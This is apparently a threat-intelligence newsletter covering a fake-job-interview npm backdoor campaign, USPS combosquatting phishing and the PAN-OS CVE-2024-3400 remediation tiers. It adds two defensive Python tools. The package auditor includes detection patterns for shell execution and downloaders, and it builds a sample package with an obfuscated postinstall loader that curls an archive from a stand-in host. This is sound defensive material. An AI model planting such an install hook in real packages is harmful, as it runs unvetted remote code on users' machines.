Ransomware/Malware Activity

Job-Seeking Software Developers Deceived into Downloading a Python Backdoor

Researchers are tracking a social engineering campaign that lures job-seeking software developers into running a malicious Python backdoor as part of a fake interview process. The campaign, dubbed "DEV#POPPER", has been tentatively attributed to North Korean actors. The attackers make initial contact by posing as hiring managers looking to fill a developer role. As part of the "interview", the candidate is asked to download a coding task from a GitHub repository, purportedly as a test of technical aptitude. The zip file hosted on GitHub contains an NPM (Node Package Manager) package along with a README.md file. When the package is run, an obfuscated JavaScript file executes a curl command that retrieves an archive from an attacker-controlled server; the archive contains an obfuscated Python script, a remote access tool (RAT) with mechanisms for persistence, command execution, FTP data exfiltration, and keystroke logging. This campaign follows closely on a similar one dubbed "Contagious Interview", in which attackers likewise posed as employers to trick job-seeking developers into installing the BeaverTail and InvisibleFerret malware. Both campaigns target software developers specifically. DEV#POPPER has been linked to North Korea on the strength of its tradecraft: targeting job-seekers through fake recruiting is a technique the Lazarus Group has used repeatedly. CTIX analysts caution those currently looking for new jobs to perform proper due diligence on prospective companies before entering an interview process, and to treat any "take-home" package that must be installed or executed as untrusted code until it has been read. CTIX analysts will continue to report on new and emerging malware and associated campaigns.
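The chain described above hinges on two things a candidate can check before running anything: whether the package registers an npm lifecycle hook that executes on `npm install`, and whether any of its JavaScript reaches for a shell, a downloader such as curl, or obfuscation. The following is an added example written for this newsletter (it is not code from the researchers or from the campaign) of a small offline audit that inspects a zipped package in memory and reports both. The sample archive it builds is constructed for illustration; its setup.js is a stand-in for an obfuscated loader, not the real one, and the host example.invalid is a reserved name that never resolves.

```python
import io
import json
import re
import zipfile

# npm lifecycle hooks that run automatically during `npm install`, i.e. before the
# candidate has knowingly executed anything.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare",
                   "prepublish", "prepublishOnly", "prepack", "postpack")

# Indicators worth reading by hand in a package a stranger asked you to run. None of
# them proves malice on its own; a lifecycle hook that reaches for child_process does.
RISK_PATTERNS = {
    "child_process": re.compile(r"child_process|\b(?:exec|execSync|execFile|spawn|spawnSync)\s*\("),
    "downloader": re.compile(r"\b(?:curl|wget)\b"),
    "dynamic_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "hex_obfuscation": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
    "obfuscator_names": re.compile(r"\b_0x[0-9a-fA-F]{4,}\b"),
}
HIGH_RISK = {"child_process", "downloader", "dynamic_eval"}


def audit_npm_zip(zip_bytes: bytes) -> dict:
    """Inspect a zipped npm package entirely in memory (nothing is extracted to disk,
    so hostile paths inside the archive cannot write anywhere) and report which
    scripts would run on install and which files contain risky constructs."""
    lifecycle = {}
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            data = zf.read(name)
            if name.rsplit("/", 1)[-1] == "package.json":
                try:
                    scripts = json.loads(data).get("scripts", {})
                except (json.JSONDecodeError, AttributeError):
                    findings.append((name, "unparseable_package_json"))
                    continue
                lifecycle.update({k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS})
            elif name.endswith((".js", ".cjs", ".mjs")):
                text = data.decode("utf-8", errors="replace")
                for label, pattern in RISK_PATTERNS.items():
                    if pattern.search(text):
                        findings.append((name, label))
    hits = {label for _, label in findings}
    if hits & HIGH_RISK or (lifecycle and hits):
        verdict = "suspicious"
    elif lifecycle:
        verdict = "review"  # something runs on install; read it before `npm install`
    else:
        verdict = "clean"
    return {"lifecycle_scripts": lifecycle, "findings": sorted(findings), "verdict": verdict}


def build_sample_zip(malicious: bool = True) -> bytes:
    """Constructed sample 'coding task' for this example. The setup.js body is a
    stand-in written for illustration, not the campaign's actual loader."""
    package_json = {"name": "coding-task", "version": "1.0.0",
                    "scripts": {"start": "node index.js"}}
    files = {
        "task/README.md": "# Coding task\n\nRun `npm install && npm start`.\n",
        "task/index.js": "console.log('implement solve() and run the tests');\n",
    }
    if malicious:
        package_json["scripts"]["postinstall"] = "node lib/setup.js"
        files["task/lib/setup.js"] = (
            "var _0x4f2a = ['child_process', 'exec'];\n"
            "require(_0x4f2a[0])[_0x4f2a[1]]("
            "'curl -s -o /tmp/p.tar https://example.invalid/p.tar && tar xf /tmp/p.tar -C /tmp');\n"
        )
    files["task/package.json"] = json.dumps(package_json, indent=2)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, content in files.items():
            zf.writestr(path, content)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        report = audit_npm_zip(build_sample_zip(malicious=flag))
        print(report["verdict"], report["lifecycle_scripts"], report["findings"])
```

Run against a real "take-home" archive by passing the bytes of the downloaded zip to audit_npm_zip(). A "review" verdict means only that a lifecycle hook exists, which legitimate packages also use; "suspicious" means a hook or script file combines with shell execution, a downloader or obfuscation and should be read line by line before any npm command is issued. The check is deliberately simple and will not see through a loader that hides its strings behind string-building or a second-stage fetch, so a clean verdict is a reason to keep reading, not to trust the package.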

Threat Actor Activity

Phishing Campaigns Targeting USPS Have Alarming Success Rates

Researchers have found an alarming volume of traffic to domains associated with phishing campaigns impersonating the United States Postal Service (USPS): traffic to the fraudulent domains often rivals or surpasses that of the legitimate USPS website, most notably during the holiday season. The investigation began with suspicious SMS messages and uncovered a large number of "combosquatting" domains, registered names that combine the USPS brand with other words, designed to mimic the official USPS site and trick users into downloading malware, sharing sensitive information, or, most commonly, paying a fraudulent "redelivery" fee. Data covering October 2023 to February 2024 indicate a sophisticated and wide-reaching effort to exploit the USPS brand, with malicious traffic peaking during the November and December holiday season. This underscores the broader risk of combosquatting, which can be applied to any brand, not only USPS. The fake sites used convincing replicas of the USPS website and package tracking system; one malicious domain attracted nearly half a million queries, and several others surpassed 150,000. CTIX analysts encourage consumers to treat unsolicited communications about package shipments with skepticism. To avoid these phishing attempts, navigate directly to the official USPS website for parcel tracking rather than clicking links in messages, which keeps personal and financial information away from the fraudulent sites. The USPS also maintains a page on its website describing these phishing campaigns, how to report potential fraud, and how to avoid being scammed. A link can be found below.
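Combosquatting is mechanically simple to look for once resolver or passive DNS data is at hand: the brand token appears fused with other words in the registrable part of a domain that is not the brand's own. The following is an added example written for this newsletter (not the researchers' tooling) that classifies hostnames relative to the USPS brand and ranks the suspicious registrable domains by query volume. It assumes, for self-containment, a tiny stand-in for the Public Suffix List and that usps.com is the only legitimate registrable domain; the query counts are constructed and are not the study's figures.

```python
# Simplified stand-in for the Public Suffix List (assumption for this example); a real
# deployment would use the full list, e.g. via the tldextract package.
PUBLIC_SUFFIXES = {"com", "net", "org", "info", "biz", "us", "top", "shop", "xyz", "co.uk"}
BRAND = "usps"
LEGITIMATE_DOMAINS = {"usps.com"}  # assumption: the only apex domain treated as USPS's own

# Ordered from least to most concerning; used to keep the worst host seen per apex domain.
SEVERITY = ["unrelated", "legitimate", "brand-in-subdomain", "brand-on-other-tld", "combosquat"]

# Constructed sample of (hostname, query count) records, e.g. from resolver logs.
SAMPLE_RECORDS = [
    ("tools.usps.com", 480_000),
    ("usps-redelivery-fee.com", 310_000),
    ("track.usps-redelivery-fee.com", 150_000),
    ("uspstracking.co.uk", 160_000),
    ("usps.package-update.top", 20_000),
    ("example.com", 900),
]


def registrable_domain(host: str) -> str:
    """Return the registrable (apex) domain of a hostname, e.g. track.usps.com -> usps.com."""
    labels = host.lower().rstrip(".").split(".")
    for n in (2, 1):  # try multi-label suffixes such as co.uk before single-label ones
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[-(n + 1):])
    return ".".join(labels[-2:])  # fallback: treat the last two labels as the apex


def classify(host: str) -> str:
    """Place a hostname in one of the SEVERITY classes relative to the brand."""
    host = host.lower().rstrip(".")
    apex = registrable_domain(host)
    if apex in LEGITIMATE_DOMAINS:
        return "legitimate"
    apex_label = apex.split(".")[0]
    if apex_label == BRAND:
        return "brand-on-other-tld"    # usps.shop: brand alone under a TLD it does not own
    if BRAND in apex_label:
        return "combosquat"            # usps-redelivery-fee.com, uspstracking.co.uk
    if BRAND in host:
        return "brand-in-subdomain"    # usps.package-update.top: brand only as a subdomain
    return "unrelated"


def rank_suspicious(records):
    """Aggregate (hostname, query_count) records per apex domain and return the
    suspicious apexes as (apex, class, total_queries), busiest first."""
    totals = {}
    for host, count in records:
        apex = registrable_domain(host)
        cls = classify(host)
        prev_count, prev_cls = totals.get(apex, (0, "unrelated"))
        worst = max(prev_cls, cls, key=SEVERITY.index)
        totals[apex] = (prev_count + count, worst)
    ranked = [(apex, cls, count) for apex, (count, cls) in totals.items()
              if cls not in ("unrelated", "legitimate")]
    return sorted(ranked, key=lambda row: -row[2])


if __name__ == "__main__":
    for apex, cls, count in rank_suspicious(SAMPLE_RECORDS):
        print(f"{count:>8}  {cls:<20} {apex}")
```

Aggregating by apex rather than by hostname matters because a single fraudulent registration usually fronts several hostnames (the apex, a "track" subdomain, and so on), and the per-domain volume is what the study compares against the real site. The substring match is intentionally narrow: it catches brand-plus-word registrations, which is what combosquatting is, but not typosquats or homoglyph domains, which need a separate edit-distance or confusable-character check.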

Vulnerabilities

Palo Alto Networks Issues Tiered Remediation Techniques for Mitigating a Recently Patched Critical Vulnerability

Palo Alto Networks has issued remediation guidance for a critical vulnerability in PAN-OS that has been actively exploited since at least March 26, 2024. The flaw, tracked as CVE-2024-3400 (CVSS score 10.0), is a command injection in the GlobalProtect feature that allows an unauthenticated attacker to execute arbitrary shell commands with root privileges on affected firewalls; it has been patched in hotfix releases for the affected PAN-OS versions. Palo Alto Networks tracks the exploitation as Operation MidnightEclipse; it involves deploying a Python-based backdoor, UPSTYLE, which executes commands embedded in specially crafted requests. No specific threat actor has been publicly named, but the sophistication suggests a state-backed group. Palo Alto Networks outlines remediation steps for four levels of compromise. Level 0 (an unsuccessful exploitation attempt) requires only updating to the latest hotfix. Level 1 (evidence that the vulnerability was tested, without harmful commands being run) also requires only the hotfix. Level 2 (potential data exfiltration, such as unauthorized copying of configuration files) requires the hotfix plus a Private Data Reset. Level 3 (interactive malicious activity, such as shell commands executed on the device) requires the hotfix plus a Factory Reset. Because both resets erase device configuration, administrators should confirm they hold a known-good configuration backup before performing either. CTIX analysts urge administrators to follow the guidance in the advisory linked below to prevent future exploitation.

The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.